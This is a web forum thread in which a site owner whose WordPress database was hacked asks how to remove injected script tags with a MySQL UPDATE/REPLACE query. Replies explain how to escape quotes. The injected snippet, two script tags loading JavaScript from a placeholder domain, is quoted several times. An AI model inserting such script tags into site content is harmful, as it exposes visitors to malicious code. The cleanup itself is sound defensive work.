1. Home
  2. Forums Index
  3. Server Side / Databases 11:46 pm May 20, 2026

Forum Moderators: open

Message Too Old, No Replies

Remove text from DB in phpMyAdmin

         

greencode

8:15 am on Sep 17, 2016 (gmt 0)

10+ Year Member Top Contributors Of The Month



My site has been hacked and I've found the script that they've inserted into a load of tables in my DB. However, when I try to remove the text I get an error.

I need to remove this text: 

<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>


But when I run the following 

UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ', '' );


I get the following error:

There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem. 

ERROR: Unknown Punctuation String @ 106
STR: //
SQL: UPDATE hei8ty6_posts SET post_content = REPLACE ( post_content, ''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ' ', '' )

SQL query:

UPDATE hei8ty6_posts SET post_content = REPLACE ( post_content, ''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ' ', '' )

MySQL said: Documentation

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0' at line 1


I'm presuming it's because there's a lot of apostrophes, quote marks, slashes etc but don't know how to resolve this. I've only ever had to remove basic text strings using this method before.

Thanks in advance for any help.

lammert

8:58 am on Sep 17, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



The single quote ' is interpreted as an SQL special character. Use two concatenated single quotes if you want to represent the quote character inside a string. More about string literals can be found here: [dev.mysql.com...]

greencode

11:40 am on Sep 17, 2016 (gmt 0)

10+ Year Member Top Contributors Of The Month



Thanks for this. So in this situation would I write it as:

UPDATE wp_posts SET post_content = REPLACE ( post_content, '''<script type='text/javascript' src='//thisisthewebsite?tid=79479_131506_0&tagid=2'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ''', '' );

lammert

2:36 pm on Sep 19, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



You still have single quotes around some text/javascript blocks. I think it should be something like 
UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type=''text/javascript'' src=''//thisisthewebsite?tid=79479_131506_0&tagid=2''></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script>', '' )
It is a little bit confusing that the first <script> declaration uses single quotes, and the second double quotes.

topr8

4:59 pm on Sep 19, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



please note: that unless you fix the way you were hacked, it is only a matter of time before it happens again. also with these injection attacks you can be attacked multiple times, it appends the code to the end of the field, so until the field space is used up, you could have several js blocks, one after the other, unless of course it actually replaces the field value altogether, then of course each successive hack merely overwrites the previous one.

with MySQL you can also use the \ character to escape quotes - which can be less confusing, as two single quotes can look just like a double quote, depending on the font you are using. I don't use phpMyAdmin, but don't see why it wouldn't work with the phpMyAdmin interface too.
hence something like:


UPDATE wp_posts SET post_content = REPLACE ( post_content, '<script type=\'text/javascript\' src=\'//thisisthewebsite?tid=79479_131506_0&tagid=2\'></script><script type="text/javascript" src="//thisisthewebsite.php?zoneid=683723"></script> ', '' );
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / Databases 11:46 pm May 20, 2026